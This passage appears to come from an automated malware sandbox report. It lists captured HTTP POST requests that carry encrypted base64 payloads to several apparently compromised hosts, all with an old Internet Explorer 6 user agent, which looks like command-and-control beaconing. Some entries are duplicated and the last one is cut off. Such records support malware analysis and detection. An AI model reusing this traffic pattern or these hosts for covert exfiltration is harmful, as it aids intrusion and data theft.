uVnVNxTjKfvee4Dt73P92mdD8puMgcAQiFkNwif7wBToAoRT+iYZustsPa3YEI6hmyvU9dGccjlG2KFSMwhXuUTwqjNsts/GBf6PTDfiy//vCKnudcTKOJCpS9iWhoJPGC8h8XoPamPC74A0izpIuA7PN5MmBb7WCo5VX5lpAVHuxG97BK86991OfK/BFzjib2e0NDBQ3vCi/hiJ0wgPDS+YGXurLIhFxab0EtEZ69Zv7S2WB9QcaJnV0AeR6lJ6yKjYDOBIkttvJZA/NdHEVbOlsZP5sOBt/9tLTQ0X644FZJ3oqZCntx4sCwa/tppqBGePls1Tnb/v1VbCcAiFwAkKRM9wQPyLVFo/TFLixes6WqBdzEh1639qLOe6iYBroGSUzkrdz4hwIcfIElS+A9Tk8XYSnIAAUy4aIJGqULDyeiqZ93CySE6hgiJCGms3uwPyh3rsdh4tAeKwVjwE4kdgT9W4UGjT2MffZ4GMgujk946IMwIGBwzp9530JDGze5AlakoWFiK8bELA+L+/RqUicCS9gfST9fPzgjVHeC1Zhw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.tvtools.fiCache-Control: no-cacheData Raw: 69 6a 74 63 73 52 2f 47 52 76 74 49 42 77 63 38 66 6c 7a 2b 69 71 67 56 42 4c 6a 31 46 4a 4b 46 77 79 64 38 6c 71 48 4b 42 72 35 73 68 49 62 6c 77 4f 49 46 53 66 62 7a 55 61 76 31 55 4f 53 46 61 74 66 4b 63 41 56 7a 7a 34 66 4e 30 63 56 35 33 6a 38 6c 62 77 2b 73 67 4d 49 32 69 76 4b 59 64 58 4d 49 69 69 32 45 67 73 6b 61 64 76 69 52 65 46 53 48 7a 55 4a 44 71 66 2f 6c 46 75 43 70 38 44 4a 34 2f 65 64 46 72 42 75 46 71 58 65 50 31 74 6b 5a 4a 74 4b 42 6f 46 6e 6b 4e 4a 73 66 53 4d 4a 6c 63 55 30 63 4d 71 43 36 66 62 64 33 33 71 35 6d 79 31 48 54 30 4a 46 4f 53 6a 6e 61 6c 65 30 74 4f 56 31 54 37 73 55 71 44 45 36 4d 49 38 74 30 58 70 4c 69 6a 34 4b 47 77 42 66 6e 64 6e 41 30 37 55 35 68 70 5a 35 34 69 71 7a 5a 42 48 53 70 6c 4c 36 45 6e 6e 50 6f 34 4a 53 52 56 64 75 68 6d 61 79 32 59 4e 64 4b 67 54 79 4f 42 31 36 69 62 38 4b 72 46 4f 47 31 73 43 6e 46 4c 6a 6c 48 53 6d 68 38 4c 35 6a 59 52 30 42 57 45 64 46 58 45 6b 68 36 67 2f 59 49 65 59 71 2f 31 78 48 38 7a 52 4b 79 4a 36 43 73 30 6f 35 70 4c 4f 4c 32 6d 72 79 49 56 72 35 4d 6b 68 76 4a 43 2f 68 2b 65 46 43 2b 36 45 6c 72 41 6e 54 70 6a 36 6d 47 51 37 6e 73 57 48 2b 64 54 44 70 63 58 70 41 33 57 4c 64 4a 7a 56 35 5a 71 37 54 58 7a 73 47 56 44 38 50 69 39 38 49 53 58 38 77 4d 68 76 69 2b 74 45 78 59 6e 66 37 5a 53 44 67 79 55 64 34 35 73 34 55 41 6e 43 52 36 5a 50 66 58 75 59 59 77 4c 32 64 61 46 41 62 33 69 4c 46 52 59 61 67 46 44 50 68 68 77 57 61 48 31 65 6f 4c 57 52 35 6a 4d 6a 37 4b 6f 45 71 38 46 34 64 71 4c 4d 42 54 43 6e 6b 71 74 33 4f 69 5a 30 63 48 35 51 77 4a 79 69 35 68 73 64 2f 51 31 4a 74 45 52 35 42 53 7a 64 6c 33 78 79 6b 2f 64 44 55 3d Data Ascii: ijtcsR/GRvtIBwc8flz+iqgVBLj1FJKFwyd8lqHKBr5shIblwOIFSfbzUav1UOSFatfKcAVzz4fN0cV53j8lbw+sgMI2ivKYdXMIii2EgskadviReFSHzUJDqf/lFuCp8DJ4/edFrBuFqXeP1tkZJtKBoFnkNJsfSMJlcU0cMqC6fbd33q5my1HT0JFOSjnale0tOV1T7sUqDE6MI8t0XpLij4KGwBfndnA07U5hpZ54iqzZBHSplL6EnnPo4JSRVduhmay2YNdKgTyOB16ib8KrFOG1sCnFLjlHSmh8L5jYR0BWEdFXEkh6g/YIeYq/1xH8zRKyJ6Cs0o5pLOL2mryIVr5MkhvJC/h+eFC+6ElrAnTpj6mGQ7nsWH+dTDpcXpA3WLdJzV5Zq7TXzsGVD8Pi98ISX8wMhvi+tExYnf7ZSDgyUd45s4UAnCR6ZPfXuYYwL2daFAb3iLFRYagFDPhhwWaH1eoLWR5jMj7KoEq8F4dqLMBTCnkqt3OiZ0cH5QwJyi5hsd/Q1JtER5BSzdl3xyk/dDU=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.otena.comCache-Control: no-cacheData Raw: 4b 36 63 4e 73 75 44 4c 52 76 74 2b 56 34 33 58 4d 34 30 69 48 52 4e 43 55 56 4e 49 43 4e 67 59 46 45 6e 70 48 50 43 47 52 69 4f 51 6e 34 69 6c 31 45 31 6f 49 46 34 74 6d 58 69 6b 38 45 67 76 59 50 42 4a 34 73 38 6d 38 6c 6b 58 44 52 68 47 68 65 39 78 62 50 5a 4b 41 54 37 46 50 36 6e 78 4c 67 38 49 75 35 74 41 56 58 38 55 39 73 59 42 4a 73 35 72 41 53 6f 46 54 54 4c 47 4c 67 41 4e 57 51 42 61 55 70 30 56 71 62 77 70 30 38 53 2b 46 4e 34 4c 42 44 45 49 78 4a 69 6b 6a 4c 43 4f 57 50 41 4c 4c 6d 42 30 63 59 2f 76 7a 76 74 69 73 50 4e 78 63 6f 54 61 54 48 4d 63 36 47 56 58 63 4b 72 32 59 49 59 67 77 42 69 6f 6e 34 68 66 41 4e 6e 45 77 41 30 31 6c 49 39 2b 69 55 41 74 6f 4d 5a 42 75 50 51 4c 45 61 37 41 64 37 77 6a 4b 78 61 48 78 6a 6f 71 7a 5a 62 45 71 5a 6c 58 51 68 61 6b 77 46 55 74 6c 42 4e 2b 4c 58 77 42 53 4a 71 31 44 30 6c 76 35 56 7a 58 7a 6a 55 33 4e 70 53 58 54 78 54 33 39 79 42 65 55 63 34 62 64 37 62 47 35 56 32 65 43 2b 66 55 31 57 74 70 55 54 35 47 36 70 4a 35 76 6b 6d 6e 43 2f 6c 4b 74 7a 5a 5a 38 59 78 44 74 64 38 6f 71 41 6a 45 77 62 4e 65 6d 4a 30 4c 64 66 58 37 46 78 61 4e 46 31 4e 73 50 31 74 58 30 66 76 55 59 46 37 6b 69 46 75 53 6d 36 61 77 78 49 5a 66 36 66 4a 34 43 55 76 58 46 30 58 49 79 70 35 50 39 67 49 59 58 4f 39 77 74 46 41 78 6d 42 70 71 34 73 36 38 43 50 31 79 63 6a 4a 78 52 4c 4f 6d 59 4a 4f 69 34 5a 76 73 73 64 7a 33 6c 6b 43 4c 36 73 54 36 69 74 42 62 70 64 4d 73 37 75 64 4c 37 6f 36 6c 70 46 70 66 30 33 2b 7a 56 46 74 33 56 65 6c 49 5a 43 48 61 37 44 47 57 79 75 6d 51 48 31 68 6b 77 46 52 6b 79 73 63 53 4e 30 7a 4f 71 64 65 67 6f 76 79 78 57 69 31 78 31 56 44 39 2f 6e 4f 32 44 79 35 79 30 36 78 52 77 39 44 44 47 58 31 77 30 70 63 3d Data Ascii: K6cNsuDLRvt+V43XM40iHRNCUVNICNgYFEnpHPCGRiOQn4il1E1oIF4tmXik8EgvYPBJ4s8m8lkXDRhGhe9xbPZKAT7FP6nxLg8Iu5tAVX8U9sYBJs5rASoFTTLGLgANWQBaUp0Vqbwp08S+FN4LBDEIxJikjLCOWPALLmB0cY/vzvtisPNxcoTaTHMc6GVXcKr2YIYgwBion4hfANnEwA01lI9+iUAtoMZBuPQLEa7Ad7wjKxaHxjoqzZbEqZlXQhakwFUtlBN+LXwBSJq1D0lv5VzXzjU3NpSXTxT39yBeUc4bd7bG5V2eC+fU1WtpUT5G6pJ5vkmnC/lKtzZZ8YxDtd8oqAjEwbNemJ0LdfX7FxaNF1NsP1tX0fvUYF7kiFuSm6awxIZf6fJ4CUvXF0XIyp5P9gIYXO9wtFAxmBpq4s68CP1ycjJxRLOmYJOi4Zvssdz3lkCL6sT6itBbpdMs7udL7o6lpFpf03+zVFt3VelIZCHa7DGWyumQH1hkwFRkyscSN0zOqdegovyxWi1x1VD9/nO2Dy5y06xRw9DDGX1w0pc=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.transsib.comCache-Control: no-cacheData Raw: 6a 32 43 52 46 38 6f 58 53 76 74 43 64 4c 72 30 4c 61 52 6d 31 34 31 33 39 69 56 36 32 33 54 58 6e 72 62 69 4d 36 65 5a 6b 39 39 66 67 77 7a 7a 69 55 71 42 55 4a 6f 53 78 72 2f 6a 39 38 2f 44 49 5a 67 70 76 4d 59 32 64 34 39 41 5a 59 52 43 76 30 4d 6f 63 35 2f 6c 44 73 72 39 34 57 54 49 66 51 78 73 70 30 45 64 2b 61 49 75 43 4c 77 41 46 41 39 79 67 4a 37 39 6e 6d 6c 5a 44 4d 4d 66 47 32 64 75 2b 45 2f 74 47 41 53 4f 42 77 43 43 69 71 31 48 55 6c 30 56 45 67 4c 69 6e 44 79 71 76 68 42 55 67 58 62 66 76 79 6c 78 75 53 43 42 54 52 47 39 33 39 54 6e 45 44 53 57 4f 57 78 44 6f 30 71 75 79 47 4d 68 33 30 5a 64 71 6a 43 34 6a 39 75 43 58 53 4c 75 72 4d 59 31 55 44 58 43 6d 5a 58 4a 6f 54 46 33 4e 49 53 74 4d 49 64 72 68 2b 57 41 53 70 59 34 57 63 36 6b 42 66 4a 6e 45 41 65 2f 4e 52 6c 4c 43 50 4a 46 45 78 79 36 4c 51 6f 77 50 42 4b 33 4f 69 52 76 77 58 38 2f 31 6c 74 37 2f 4e 72 39 42 2b 42 68 2b 45 75 4e 31 69 72 62 6e 36 46 69 4b 6f 65 4c 33 70 71 46 47 43 6c 6e 49 67 59 41 67 75 32 76 56 63 43 51 66 76 64 76 5a 77 52 70 71 79 5a 42 41 77 6e 58 33 4b 64 4d 64 79 6d 58 2f 79 5a 32 64 61 6d 59 6a 62 2f 4a 38 5a 4c 5a 57 78 74 39 66 2b 6d 7a 59 57 5a 71 67 47 57 31 79 6e 31 72 52 54 6f 49 52 48 77 7a 6c 73 43 51 42 49 30 59 67 65 6e 51 68 66 43 42 44 4c 34 42 74 5a 36 4f 62 62 71 63 48 6c 66 77 75 77 64 78 73 70 78 39 77 4e 76 48 6d 74 32 78 2b 41 69 6b 6a 34 68 59 67 4f 67 50 55 48 4e 31 57 46 6b 76 78 30 74 7a 71 34 32 39 75 35 41 64 72 36 50 78 32 78 78 77 51 54 66 73 69 6e 70 68 4c 46 6c 38 5a 32 70 59 48 4d 50 30 66 31 46 78 4c 79 42 6c 45 37 4d 4b 6f 6d 45 48 48 6a 49 79 61 61 64 52 53 5a 77 47 6c 2b 48 70 54 77 3d 3d Data Ascii: j2CRF8oXSvtCdLr0LaRm14139iV623TXnrbiM6eZk99fgwzziUqBUJoSxr/j98/DIZgpvMY2d49AZYRCv0Moc5/lDsr94WTIfQxsp0Ed+aIuCLwAFA9ygJ79nmlZDMMfG2du+E/tGASOBwCCiq1HUl0VEgLinDyqvhBUgXbfvylxuSCBTRG939TnEDSWOWxDo0quyGMh30ZdqjC4j9uCXSLurMY1UDXCmZXJoTF3NIStMIdrh+WASpY4Wc6kBfJnEAe/NRlLCPJFExy6LQowPBK3OiRvwX8/1lt7/Nr9B+Bh+EuN1irbn6FiKoeL3pqFGClnIgYAgu2vVcCQfvdvZwRpqyZBAwnX3KdMdymX/yZ2damYjb/J8ZLZWxt9f+mzYWZqgGW1yn1rRToIRHwzlsCQBI0YgenQhfCBDL4BtZ6ObbqcHlfwuwdxspx9wNvHmt2x+Aikj4hYgOgPUHN1WFkvx0tzq429u5Adr6Px2xxwQTfsinphLFl8Z2pYHMP0f1FxLyBlE7MKomEHHjIyaadRSZwGl+HpTw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nunomira.comCache-Control: no-cacheData Raw: 4a 51 6e 4f 72 5a 47 6f 52 76 76 2b 48 34 6f 73 4d 45 68 59 6e 4f 71 4f 51 58 52 50 31 64 73 45 56 51 43 69 68 66 43 2f 45 39 68 58 41 71 58 4e 71 41 45 38 41 44 31 4a 67 35 4c 71 37 78 73 53 41 52 75 45 79 6e 4b 2f 46 69 55 56 43 2f 44 44 41 4d 49 4d 57 49 4f 36 79 78 36 6e 64 44 71 68 65 43 42 2b 32 41 66 37 7a 57 59 30 43 6a 33 66 36 4e 54 74 6a 6e 6f 4c 71 6c 41 52 67 70 79 70 7a 79 67 41 64 2f 58 36 39 57 4d 6c 35 6b 53 44 51 77 61 6c 73 33 75 4a 4e 49 46 6a 39 4b 63 4a 32 6e 7a 32 52 79 41 64 79 74 44 79 52 55 30 2f 38 71 30 68 74 4a 47 43 6c 2b 47 48 48 34 6a 4e 65 73 4c 74 35 33 48 55 52 4b 33 34 77 77 5a 2f 4e 79 63 43 7a 72 43 55 43 53 31 6e 71 46 54 61 71 55 7a 65 38 55 59 32 47 70 51 4d 57 64 57 4d 31 67 30 72 6e 6f 76 48 42 30 2f 71 67 59 47 6a 64 35 75 64 7a 6b 44 69 52 2f 66 41 5a 6c 41 52 50 62 35 77 73 56 49 4c 50 4e 2b 67 35 46 6f 2f 55 43 73 41 43 34 35 6b 49 56 79 75 59 67 53 30 61 51 55 39 74 49 7a 73 38 6f 51 34 48 36 65 30 74 7a 65 71 34 4f 6d 38 48 39 6c 43 2f 31 61 30 6b 61 34 71 41 75 61 2b 35 39 41 61 72 6d 4b 74 5a 66 33 32 76 62 7a 42 4a 72 2f 64 45 4a 65 53 4f 69 37 54 47 53 71 6d 44 78 63 74 63 4e 64 2f 57 47 6b 59 76 54 71 54 39 61 4b 70 46 48 62 6a 4a 39 59 74 65 41 34 67 46 45 6b 77 38 53 71 6f 37 69 5a 52 76 74 2b 4c 54 66 71 49 64 76 6a 74 4c 5a 33 63 77 37 65 6a 69 6b 37 5a 6b 32 6b 49 2f 30 42 71 49 51 41 76 62 6f 35 52 73 49 75 43 53 4a 42 43 4c 65 37 43 51 74 6b 70 35 33 53 72 53 57 57 63 37 75 2f 62 34 66 46 71 35 6b 53 6b 46 70 36 4e 73 65 48 34 56 44 5a 6c 74 49 62 57 52 67 58 6c 72 38 62 70 72 53 5a 56 38 6d 77 4e 4c 31 34 66 7a 6d 6a 4f 58 76 53 77 39 31 64 61 42 6f 31 4b 44 45 77 7a 45 4b 4c 65 32 34 71 31 4c 63 78 4e 52 41 3d 3d Data Ascii: JQnOrZGoRvv+H4osMEhYnOqOQXRP1dsEVQCihfC/E9hXAqXNqAE8AD1Jg5Lq7xsSARuEynK/FiUVC/DDAMIMWIO6yx6ndDqheCB+2Af7zWY0Cj3f6NTtjnoLqlARgpypzygAd/X69WMl5kSDQwals3uJNIFj9KcJ2nz2RyAdytDyRU0/8q0htJGCl+GHH4jNesLt53HURK34wwZ/NycCzrCUCS1nqFTaqUze8UY2GpQMWdWM1g0rnovHB0/qgYGjd5udzkDiR/fAZlARPb5wsVILPN+g5Fo/UCsAC45kIVyuYgS0aQU9tIzs8oQ4H6e0tzeq4Om8H9lC/1a0ka4qAua+59AarmKtZf32vbzBJr/dEJeSOi7TGSqmDxctcNd/WGkYvTqT9aKpFHbjJ9YteA4gFEkw8Sqo7iZRvt+LTfqIdvjtLZ3cw7ejik7Zk2kI/0BqIQAvbo5RsIuCSJBCLe7CQtkp53SrSWWc7u/b4fFq5kSkFp6NseH4VDZltIbWRgXlr8bprSZV8mwNL14fzmjOXvSw91daBo1KDEwzEKLe24q1LcxNRA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.transsib.comCache-Control: no-cacheData Raw: 6a 32 43 52 46 38 6f 58 53 76 74 43 64 4c 72 30 4c 61 52 6d 31 34 31 33 39 69 56 36 32 33 54 58 6e 72 62 69 4d 36 65 5a 6b 39 39 66 67 77 7a 7a 69 55 71 42 55 4a 6f 53 78 72 2f 6a 39 38 2f 44 49 5a 67 70 76 4d 59 32 64 34 39 41 5a 59 52 43 76 30 4d 6f 63 35 2f 6c 44 73 72 39 34 57 54 49 66 51 78 73 70 30 45 64 2b 61 49 75 43 4c 77 41 46 41 39 79 67 4a 37 39 6e 6d 6c 5a 44 4d 4d 66 47 32 64 75 2b 45 2f 74 47 41 53 4f 42 77 43 43 69 71 31 48 55 6c 30 56 45 67 4c 69 6e 44 79 71 76 68 42 55 67 58 62 66 76 79 6c 78 75 53 43 42 54 52 47 39 33 39 54 6e 45 44 53 57 4f 57 78 44 6f 30 71 75 79 47 4d 68 33 30 5a 64 71 6a 43 34 6a 39 75 43 58 53 4c 75 72 4d 59 31 55 44 58 43 6d 5a 58 4a 6f 54 46 33 4e 49 53 74 4d 49 64 72 68 2b 57 41 53 70 59 34 57 63 36 6b 42 66 4a 6e 45 41 65 2f 4e 52 6c 4c 43 50 4a 46 45 78 79 36 4c 51 6f 77 50 42 4b 33 4f 69 52 76 77 58 38 2f 31 6c 74 37 2f 4e 72 39 42 2b 42 68 2b 45 75 4e 31 69 72 62 6e 36 46 69 4b 6f 65 4c 33 70 71 46 47 43 6c 6e 49 67 59 41 67 75 32 76 56 63 43 51 66 76 64 76 5a 77 52 70 71 79 5a 42 41 77 6e 58 33 4b 64 4d 64 79 6d 58 2f 79 5a 32 64 61 6d 59 6a 62 2f 4a 38 5a 4c 5a 57 78 74 39 66 2b 6d 7a 59 57 5a 71 67 47 57 31 79 6e 31 72 52 54 6f 49 52 48 77 7a 6c 73 43 51 42 49 30 59 67 65 6e 51 68 66 43 42 44 4c 34 42 74 5a 36 4f 62 62 71 63 48 6c 66 77 75 77 64 78 73 70 78 39 77 4e 76 48 6d 74 32 78 2b 41 69 6b 6a 34 68 59 67 4f 67 50 55 48 4e 31 57 46 6b 76 78 30 74 7a 71 34 32 39 75 35 41 64 72 36 50 78 32 78 78 77 51 54 66 73 69 6e 70 68 4c 46 6c 38 5a 32 70 59 48 4d 50 30 66 31 46 78 4c 79 42 6c 45 37 4d 4b 6f 6d 45 48 48 6a 49 79 61 61 64 52 53 5a 77 47 6c 2b 48 70 54 77 3d 3d Data Ascii: j2CRF8oXSvtCdLr0LaRm14139iV623TXnrbiM6eZk99fgwzziUqBUJoSxr/j98/DIZgpvMY2d49AZYRCv0Moc5/lDsr94WTIfQxsp0Ed+aIuCLwAFA9ygJ79nmlZDMMfG2du+E/tGASOBwCCiq1HUl0VEgLinDyqvhBUgXbfvylxuSCBTRG939TnEDSWOWxDo0quyGMh30ZdqjC4j9uCXSLurMY1UDXCmZXJoTF3NIStMIdrh+WASpY4Wc6kBfJnEAe/NRlLCPJFExy6LQowPBK3OiRvwX8/1lt7/Nr9B+Bh+EuN1irbn6FiKoeL3pqFGClnIgYAgu2vVcCQfvdvZwRpqyZBAwnX3KdMdymX/yZ2damYjb/J8ZLZWxt9f+mzYWZqgGW1yn1rRToIRHwzlsCQBI0YgenQhfCBDL4BtZ6ObbqcHlfwuwdxspx9wNvHmt2x+Aikj4hYgOgPUHN1WFkvx0tzq429u5Adr6Px2xxwQTfsinphLFl8Z2pYHMP0f1FxLyBlE7MKomEHHjIyaadRSZwGl+HpTw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.petsfan.comCache-Control: no-cacheData Raw: 73 49 72 43 72 39 4f 34 52 76 75 47 77 7a 78 36 6d 6d 68 46 4f 58 77 43 6c 50 61 35 72 31 6e 47 74 38 4f 4a 6c 53 69 30 32 56 43 4e 76 2b 4a 4d 45 47 42 44 36 6e 4c 77 4e 63 34 46 4e 63 7a 53 61 72 33 44 43 2f 30 75 51 7a 39 67 54 77 70 6e 51 35 76 7a 2b 71 45 43 51 32 55 44 6f 45 5a 69 64 72 59 4d 68 77 49 57 4f 35 79 6b 34 6c 4d 37 31 73 77 67 76 36 41 70 55 36 65 74 58 70 45 49 62 62 51 73 44 6a 58 61 2b 64 56 77 6b 30 31 43 47 50 39 55 72 56 68 45 4f 44 75 53 53 72 59 4a 4d 62 74 6c 65 39 38 56 65 55 34 44 4d 52 4b 54 58 44 4d 35 4c 69 37 6a 6c 66 50 32 4c 4e 34 6a 4b 74 6f 2b 61 54 6b 45 55 57 46 65 6c 6a 79 49 33 6a 53 42 2f 71 4f 38 56 51 6a 43 7a 49 78 50 6d 39 54 36 49 47 6b 4c 53 32 41 36 35 66 4f 47 41 54 39 57 73 6d 4f 51 44 38 64 72 4f 66 72 57 37 69 57 73 31 66 61 65 61 62 4f 6d 54 4b 4e 4c 51 75 58 48 6f 79 59 6e 53 6b 4f 65 73 32 4e 43 73 31 2f 34 78 59 39 75 48 66 6d 32 58 4f 51 44 37 73 70 2b 4d 62 57 59 37 2f 52 34 35 4f 74 2f 5a 31 6e 53 4e 32 78 30 72 72 64 75 4e 41 7a 50 49 52 71 64 78 51 58 46 59 73 68 43 51 6d 76 51 73 39 55 79 61 54 67 6b 41 37 42 49 71 51 6a 38 48 4f 4a 41 59 32 66 62 4a 44 55 6b 4a 77 6a 7a 39 6e 32 35 4d 6c 4e 78 36 49 78 69 37 50 45 48 2b 46 51 46 44 39 62 45 69 49 39 74 71 49 43 73 6c 7a 70 74 56 46 48 62 66 66 66 37 4d 67 36 4b 66 6a 4f 38 4d 41 7a 37 31 4e 6c 2f 49 57 5a 37 6c 56 72 56 41 2b 2b 42 43 31 67 4b 69 30 6d 44 6c 59 6d 30 62 4a 6f 53 6e 56 75 65 77 35 62 38 45 69 70 66 41 56 61 33 58 44 72 49 56 48 55 6d 4b 6c 4a 54 4f 59 6b 6a 63 46 34 55 52 72 63 58 79 6d 42 6a 41 73 6a 64 54 44 50 66 56 49 48 37 4f 6f 36 49 75 31 63 73 6d 6a 2f 51 77 4d 50 33 34 4e 62 6a 37 4c 63 5a 73 6e 66 32 59 38 59 76 31 4f 7a 5a 36 70 58 73 66 33 56 35 54 42 30 4b 30 55 71 36 47 6d 36 39 4a 41 72 6e 2b 49 63 65 34 51 3d 3d Data Ascii: sIrCr9O4RvuGwzx6mmhFOXwClPa5r1nGt8OJlSi02VCNv+JMEGBD6nLwNc4FNczSar3DC/0uQz9gTwpnQ5vz+qECQ2UDoEZidrYMhwIWO5yk4lM71swgv6ApU6etXpEIbbQsDjXa+dVwk01CGP9UrVhEODuSSrYJMbtle98VeU4DMRKTXDM5Li7jlfP2LN4jKto+aTkEUWFeljyI3jSB/qO8VQjCzIxPm9T6IGkLS2A65fOGAT9WsmOQD8drOfrW7iWs1faeabOmTKNLQuXHoyYnSkOes2NCs1/4xY9uHfm2XOQD7sp+MbWY7/R45Ot/Z1nSN2x0rrduNAzPIRqdxQXFYshCQmvQs9UyaTgkA7BIqQj8HOJAY2fbJDUkJwjz9n25MlNx6Ixi7PEH+FQFD9bEiI9tqICslzptVFHbfff7Mg6KfjO8MAz71Nl/IWZ7lVrVA++BC1gKi0mDlYm0bJoSnVuew5b8EipfAVa3XDrIVHUmKlJTOYkjcF4URrcXymBjAsjdTDPfVIH7Oo6Iu1csmj/QwMP34Nbj7LcZsnf2Y8Yv1OzZ6pXsf3V5TB0K0Uq6Gm69JArn+Ice4Q==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 604User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mqs.com.brCache-Control: no-cacheCookie: _mcnc=1Data Raw: 50 75 77 66 74 68 43 38 44 50 76 58 51 67 39 67 6f 2b 43 53 62 4d 4d 4e 7a 69 6b 34 5a 42 38 41 52 4f 78 79 7a 74 77 50 73 54 36 62 2b 30 67 6a 41 6e 66 50 32 6f 5a 77 4c 66 7a 54 57 6c 54 73 4e 7a 78 7a 66 78 52 6b 48 41 49 4f 73 30 6c 53 70 35 6e 65 78 5a 78 35 68 6a 34 76 46 7a 34 51 51 43 6e 63 50 78 62 66 57 50 2b 41 76 2b 76 68 44 59 6d 49 4b 53 34 38 4b 36 49 58 70 66 35 68 66 63 78 35 66 52 2b 57 2f 67 46 49 34 6a 34 78 70 69 73 39 67 59 73 39 2b 4d 50 62 6f 43 79 59 4b 4b 44 6b 54 5a 36 32 67 41 77 63 78 51 71 31 77 32 74 6f 45 34 75 38 78 57 34 71 75 54 5a 7a 6f 50 79 6e 6c 36 48 73 73 39 4d 33 48 6a 45 59 35 67 71 4d 6e 70 30 69 63 67 38 64 59 33 6d 79 75 75 38 6d 76 2f 53 71 65 2f 39 4b 35 6c 46 37 42 56 74 77 47 52 32 50 47 36 77 47 35 51 4f 49 56 6f 72 35 72 75 42 46 43 35 57 77 6c 43 7a 47 69 52 36 33 42 48 43 6b 42 69 33 6f 62 54 75 6e 6f 44 4c 34 6a 66 42 61 44 41 6b 4b 43 68 37 6f 75 2f 63 5a 4f 4b 67 79 37 79 56 4e 52 68 2f 37 43 7a 50 2b 43 72 45 43 74 4d 37 30 71 69 2b 46 44 46 2b 68 41 70 57 64 4f 2b 78 4d 34 6c 36 7a 6b 38 46 4b 6f 51 41 6b 73 73 61 6b 48 41 53 56 2b 6f 59 4a 4c 6d 31 45 61 74 65 69 50 75 4d 76 78 30 37 33 50 53 54 6b 6e 64 46 78 75 6d 44 47 4e 73 64 52 76 55 63 73 73 36 33 49 53 79 65 4f 55 6f 64 30 4a 56 6c 38 6f 37 4b 39 64 77 54 56 50 62 34 35 71 68 45 55 74 42 44 4e 45 54 79 67 5a 4e 4d 77 35 44 58 73 6c 76 4c 6a 68 67 74 7a 37 48 4d 7a 76 55 39 33 6d 7a 67 42 36 71 59 65 74 30 70 31 37 49 6f 67 34 71 46 48 4f 6c 59 33 69 49 62 34 6b 6a 4b 2b 66 68 5a 42 41 69 69 71 73 6f 6b 59 4f 6f 6d 38 72 59 43 46 4f 4c 70 7a 53 6b 6b 67 59 65 39 6d 58 71 59 4b 4a 4d 71 4d 66 6b 65 55 46 47 78 43 55 53 58 43 37 35 2f 31 34 6e 76 6e 62 52 4e 50 78 44 6d 4b 41 6b 35 54 47 38 53 67 6e 76 6a 52 34 48 4d 62 5a 6d 62 34 30 61 35 41 72 6c 62 46 63 41 3d 3d Data Ascii: PuwfthC8DPvXQg9go+CSbMMNzik4ZB8AROxyztwPsT6b+0gjAnfP2oZwLfzTWlTsNzxzfxRkHAIOs0lSp5nexZx5hj4vFz4QQCncPxbfWP+Av+vhDYmIKS48K6IXpf5hfcx5fR+W/gFI4j4xpis9gYs9+MPboCyYKKDkTZ62gAwcxQq1w2toE4u8xW4quTZzoPynl6Hss9M3HjEY5gqMnp0icg8dY3myuu8mv/Sqe/9K5lF7BVtwGR2PG6wG5QOIVor5ruBFC5WwlCzGiR63BHCkBi3obTunoDL4jfBaDAkKCh7ou/cZOKgy7yVNRh/7CzP+CrECtM70qi+FDF+hApWdO+xM4l6zk8FKoQAkssakHASV+oYJLm1EateiPuMvx073PSTkndFxumDGNsdRvUcss63ISyeOUod0JVl8o7K9dwTVPb45qhEUtBDNETygZNMw5DXslvLjhgtz7HMzvU93mzgB6qYet0p17Iog4qFHOlY3iIb4kjK+fhZBAiiqsokYOom8rYCFOLpzSkkgYe9mXqYKJMqMfkeUFGxCUSXC75/14nvnbRNPxDmKAk5TG8SgnvjR4HMbZmb40a5ArlbFcA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nunomira.comCache-Control: no-cacheData Raw: 4a 51 6e 4f 72 5a 47 6f 52 76 76 2b 48 34 6f 73 4d 45 68 59 6e 4f 71 4f 51 58 52 50 31 64 73 45 56 51 43 69 68 66 43 2f 45 39 68 58 41 71 58 4e 71 41 45 38 41 44 31 4a 67 35 4c 71 37 78 73 53 41 52 75 45 79 6e 4b 2f 46 69 55 56 43 2f 44 44 41 4d 49 4d 57 49 4f 36 79 78 36 6e 64 44 71 68 65 43 42 2b 32 41 66 37 7a 57 59 30 43 6a 33 66 36 4e 54 74 6a 6e 6f 4c 71 6c 41 52 67 70 79 70 7a 79 67 41 64 2f 58 36 39 57 4d 6c 35 6b 53 44 51 77 61 6c 73 33 75 4a 4e 49 46 6a 39 4b 63 4a 32 6e 7a 32 52 79 41 64 79 74 44 79 52 55 30 2f 38 71 30 68 74 4a 47 43 6c 2b 47 48 48 34 6a 4e 65 73 4c 74 35 33 48 55 52 4b 33 34 77 77 5a 2f 4e 79 63 43 7a 72 43 55 43 53 31 6e 71 46 54 61 71 55 7a 65 38 55 59 32 47 70 51 4d 57 64 57 4d 31 67 30 72 6e 6f 76 48 42 30 2f 71 67 59 47 6a 64 35 75 64 7a 6b 